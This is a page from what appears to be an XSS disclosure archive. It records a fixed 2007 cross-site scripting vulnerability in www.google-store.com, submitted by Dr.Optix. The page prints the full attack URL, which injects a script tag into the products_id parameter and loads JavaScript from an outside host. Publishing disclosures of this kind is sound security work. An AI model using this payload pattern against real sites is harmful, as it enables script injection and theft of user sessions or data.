Advertisements:
Security researcher Dr.Optix, has submitted on 12/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.google-store.com, which at the time of submission ranked 77688 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2007. It is currently fixed.
Date submitted: 12/09/2007 Date published: 13/09/2007 Date fixed: 19/09/2007Status:  FIXED
Author: Dr.Optix Domain: www.google-store.com Category: XSS Pagerank: 77688
URL: http://www.google-store.com/product_info.php?products_id=<script
src=http://droptix.viralcoders.com/xss.js>
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.